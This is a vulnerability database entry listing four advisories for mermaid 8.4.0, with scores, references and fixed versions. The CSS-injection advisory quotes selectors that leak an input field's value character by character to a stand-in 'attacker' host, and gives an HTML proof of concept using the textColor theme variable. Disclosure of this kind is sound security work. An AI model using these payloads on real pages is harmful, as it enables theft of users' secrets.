Lookup for vulnerable packages by Package URL.

Purlpkg:npm/mermaid@8.4.0
Typenpm
Namespace
Namemermaid
Version8.4.0
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version10.9.4
Latest_non_vulnerable_version11.10.0
Affected_by_vulnerabilities
0
url VCID-6qac-5y2d-akdd
vulnerability_id VCID-6qac-5y2d-akdd
summary
Possible inject arbitrary `CSS` into the generated graph affecting the container HTML
An attacker is able to inject arbitrary `CSS` into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted `CSS` selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the `value` attribute one character at a time. Whenever there is an actual match, an `http` request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character.

```css
input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }
```

### Patches
_Has the problem been patched? What versions should users upgrade to?_

### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_

### References
_Are there any links users can visit to find out more?_

### For more information
If you have any questions or comments about this advisory:
* Open an issue in [example link to repo](http://example.com)
* Email us at [example email address](mailto:example@example.com)
## Product

mermaid.js

## Tested Version

[v9.1.1](https://github.com/mermaid-js/mermaid/releases/tag/9.1.1)

## Details

### Issue 1: Multiple CSS Injection (`GHSL-2022-036`)

By supplying a carefully crafted `textColor` theme variable, an attacker can inject arbitrary `CSS` rules into the document. In the following snippet we can see that `getStyles` does not sanitize any of the theme variables leaving the door open for `CSS` injection.

_Snippet from [src/styles.js](https://github.com/mermaid-js/mermaid/blob/9eae97ddab1b6eca58d2fd4af62357d2f4d8d1f7/src/styles.js#L35):_

```js
const getStyles = (type, userStyles, options) => {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }
```

For example, if we set `textColor` to `"green;} #target { background-color: crimson }"` the resulting `CSS` will contain a new selector `#target` that will apply a `crimson` background color to an arbitrary element.

```html
<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>
```

In the proof of concept above we used the `textColor` variable to inject `CSS`, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:

- https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/mermaidAPI.js#L393
- https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/styles.js#L35

#### Impact

This issue may lead to `Information Disclosure` via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

#### Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-31108
reference_id
reference_type
scores
0
value 0.00235
scoring_system epss
scoring_elements 0.4642
published_at 2026-04-07T12:55:00Z
1
value 0.00235
scoring_system epss
scoring_elements 0.46463
published_at 2026-04-24T12:55:00Z
2
value 0.00235
scoring_system epss
scoring_elements 0.46482
published_at 2026-04-21T12:55:00Z
3
value 0.00235
scoring_system epss
scoring_elements 0.46535
published_at 2026-04-18T12:55:00Z
4
value 0.00235
scoring_system epss
scoring_elements 0.46537
published_at 2026-04-16T12:55:00Z
5
value 0.00235
scoring_system epss
scoring_elements 0.46479
published_at 2026-04-13T12:55:00Z
6
value 0.00235
scoring_system epss
scoring_elements 0.46499
published_at 2026-04-11T12:55:00Z
7
value 0.00235
scoring_system epss
scoring_elements 0.46475
published_at 2026-04-08T12:55:00Z
8
value 0.00235
scoring_system epss
scoring_elements 0.4647
published_at 2026-04-12T12:55:00Z
9
value 0.00235
scoring_system epss
scoring_elements 0.46476
published_at 2026-04-09T12:55:00Z
10
value 0.00235
scoring_system epss
scoring_elements 0.46451
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-31108
1
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31108
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31108
2
reference_url https://github.com/mermaid-js/mermaid
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid
3
reference_url https://github.com/mermaid-js/mermaid/commit/0ae1bdb61adff1cd485caff8c62ec6b8ac57b225
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:53Z/
url https://github.com/mermaid-js/mermaid/commit/0ae1bdb61adff1cd485caff8c62ec6b8ac57b225
4
reference_url https://github.com/mermaid-js/mermaid/security/advisories/GHSA-x3vm-38hw-55wf
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:53Z/
url https://github.com/mermaid-js/mermaid/security/advisories/GHSA-x3vm-38hw-55wf
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-31108
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-31108
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014540
reference_id 1014540
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014540
7
reference_url https://github.com/advisories/GHSA-x3vm-38hw-55wf
reference_id GHSA-x3vm-38hw-55wf
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x3vm-38hw-55wf
fixed_packages
0
url pkg:npm/mermaid@9.1.2
purl pkg:npm/mermaid@9.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-6qac-5y2d-akdd
1
vulnerability VCID-fwuk-z3uk-1ygf
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@9.1.2
1
url pkg:npm/mermaid@9.1.3
purl pkg:npm/mermaid@9.1.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-fwuk-z3uk-1ygf
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@9.1.3
aliases CVE-2022-31108, GHSA-x3vm-38hw-55wf
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6qac-5y2d-akdd
1
url VCID-fgz4-kbun-23bn
vulnerability_id VCID-fgz4-kbun-23bn
summary
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Mermaid is a Javascript based diagramming and charting tool that uses Markdown-inspired text definitions and a renderer to create and modify complex diagrams., malicious diagrams can run javascript code at diagram readers' machines. Users should upgrade to to receive a patch. There are no known workarounds aside from upgrading.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-43861
reference_id
reference_type
scores
0
value 0.00493
scoring_system epss
scoring_elements 0.6574
published_at 2026-04-21T12:55:00Z
1
value 0.00493
scoring_system epss
scoring_elements 0.6562
published_at 2026-04-01T12:55:00Z
2
value 0.00493
scoring_system epss
scoring_elements 0.65669
published_at 2026-04-02T12:55:00Z
3
value 0.00493
scoring_system epss
scoring_elements 0.65699
published_at 2026-04-04T12:55:00Z
4
value 0.00493
scoring_system epss
scoring_elements 0.65664
published_at 2026-04-07T12:55:00Z
5
value 0.00493
scoring_system epss
scoring_elements 0.65715
published_at 2026-04-08T12:55:00Z
6
value 0.00493
scoring_system epss
scoring_elements 0.65728
published_at 2026-04-09T12:55:00Z
7
value 0.00493
scoring_system epss
scoring_elements 0.65749
published_at 2026-04-11T12:55:00Z
8
value 0.00493
scoring_system epss
scoring_elements 0.65735
published_at 2026-04-12T12:55:00Z
9
value 0.00493
scoring_system epss
scoring_elements 0.65705
published_at 2026-04-13T12:55:00Z
10
value 0.00493
scoring_system epss
scoring_elements 0.65741
published_at 2026-04-16T12:55:00Z
11
value 0.00493
scoring_system epss
scoring_elements 0.65754
published_at 2026-04-24T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-43861
1
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43861
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43861
2
reference_url https://github.com/mermaid-js/mermaid
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid
3
reference_url https://github.com/mermaid-js/mermaid/commit/066b7a0d0bda274d94a2f2d21e4323dab5776d83
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid/commit/066b7a0d0bda274d94a2f2d21e4323dab5776d83
4
reference_url https://github.com/mermaid-js/mermaid/releases/tag/8.13.8
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid/releases/tag/8.13.8
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-43861
reference_id CVE-2021-43861
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-43861
6
reference_url https://github.com/advisories/GHSA-p3rp-vmj9-gv6v
reference_id GHSA-p3rp-vmj9-gv6v
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p3rp-vmj9-gv6v
7
reference_url https://github.com/mermaid-js/mermaid/security/advisories/GHSA-p3rp-vmj9-gv6v
reference_id GHSA-p3rp-vmj9-gv6v
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid/security/advisories/GHSA-p3rp-vmj9-gv6v
fixed_packages
0
url pkg:npm/mermaid@8.13.8
purl pkg:npm/mermaid@8.13.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-6qac-5y2d-akdd
1
vulnerability VCID-fwuk-z3uk-1ygf
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@8.13.8
aliases CVE-2021-43861, GHSA-p3rp-vmj9-gv6v
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fgz4-kbun-23bn
2
url VCID-fwuk-z3uk-1ygf
vulnerability_id VCID-fwuk-z3uk-1ygf
summary
Prototype pollution vulnerability found in Mermaid's bundled version of DOMPurify
The following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack.

This affects the built:

- `dist/mermaid.min.js`
- `dist/mermaid.js`
- `dist/mermaid.esm.mjs`
- `dist/mermaid.esm.min.mjs`

This will also affect users that use the above files via a CDN link, e.g. `https://cdn.jsdelivr.net/npm/mermaid@10.9.2/dist/mermaid.min.js`

**Users that use the default NPM export of `mermaid`, e.g. `import mermaid from 'mermaid'`, or the `dist/mermaid.core.mjs` file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like `npm audit fix`.**

### Patches

- `develop` branch: 6c785c93166c151d27d328ddf68a13d9d65adc00
- backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34
references
0
reference_url https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674
1
reference_url https://github.com/mermaid-js/mermaid
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid
2
reference_url https://github.com/mermaid-js/mermaid/commit/6c785c93166c151d27d328ddf68a13d9d65adc00
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid/commit/6c785c93166c151d27d328ddf68a13d9d65adc00
3
reference_url https://github.com/mermaid-js/mermaid/commit/92a07ffe40aab2769dd1c3431b4eb5beac282b34
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid/commit/92a07ffe40aab2769dd1c3431b4eb5beac282b34
4
reference_url https://github.com/mermaid-js/mermaid/security/advisories/GHSA-m4gq-x24j-jpmf
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid/security/advisories/GHSA-m4gq-x24j-jpmf
5
reference_url https://github.com/advisories/GHSA-m4gq-x24j-jpmf
reference_id GHSA-m4gq-x24j-jpmf
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m4gq-x24j-jpmf
fixed_packages
0
url pkg:npm/mermaid@10.9.3
purl pkg:npm/mermaid@10.9.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-q79q-8yzx-p3f6
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@10.9.3
1
url pkg:npm/mermaid@11.0.0-alpha.1
purl pkg:npm/mermaid@11.0.0-alpha.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-q79q-8yzx-p3f6
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@11.0.0-alpha.1
aliases GHSA-m4gq-x24j-jpmf
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fwuk-z3uk-1ygf
3
url VCID-x94b-cysu-4fbe
vulnerability_id VCID-x94b-cysu-4fbe
summary
Cross-site Scripting in Mermaid
Mermaid before 8.11.0 allows XSS when the antiscript feature is used.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-35513
reference_id
reference_type
scores
0
value 0.00307
scoring_system epss
scoring_elements 0.53907
published_at 2026-04-24T12:55:00Z
1
value 0.00307
scoring_system epss
scoring_elements 0.53851
published_at 2026-04-02T12:55:00Z
2
value 0.00307
scoring_system epss
scoring_elements 0.5388
published_at 2026-04-04T12:55:00Z
3
value 0.00307
scoring_system epss
scoring_elements 0.53854
published_at 2026-04-07T12:55:00Z
4
value 0.00307
scoring_system epss
scoring_elements 0.53905
published_at 2026-04-08T12:55:00Z
5
value 0.00307
scoring_system epss
scoring_elements 0.53904
published_at 2026-04-09T12:55:00Z
6
value 0.00307
scoring_system epss
scoring_elements 0.5395
published_at 2026-04-11T12:55:00Z
7
value 0.00307
scoring_system epss
scoring_elements 0.53933
published_at 2026-04-12T12:55:00Z
8
value 0.00307
scoring_system epss
scoring_elements 0.53916
published_at 2026-04-13T12:55:00Z
9
value 0.00307
scoring_system epss
scoring_elements 0.53954
published_at 2026-04-16T12:55:00Z
10
value 0.00307
scoring_system epss
scoring_elements 0.5396
published_at 2026-04-18T12:55:00Z
11
value 0.00307
scoring_system epss
scoring_elements 0.53941
published_at 2026-04-21T12:55:00Z
12
value 0.00307
scoring_system epss
scoring_elements 0.53832
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-35513
1
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35513
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35513
2
reference_url https://github.com/mermaid-js/mermaid/issues/2122
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid/issues/2122
3
reference_url https://github.com/mermaid-js/mermaid/pull/2123
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid/pull/2123
4
reference_url https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e
5
reference_url https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-35513
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-35513
7
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=990449
reference_id 990449
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=990449
8
reference_url https://github.com/advisories/GHSA-4f6x-49g2-99fm
reference_id GHSA-4f6x-49g2-99fm
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4f6x-49g2-99fm
fixed_packages
0
url pkg:npm/mermaid@8.11.0
purl pkg:npm/mermaid@8.11.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-6qac-5y2d-akdd
1
vulnerability VCID-fgz4-kbun-23bn
2
vulnerability VCID-fwuk-z3uk-1ygf
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@8.11.0
aliases CVE-2021-35513, GHSA-4f6x-49g2-99fm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-x94b-cysu-4fbe
Fixing_vulnerabilities
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:npm/mermaid@8.4.0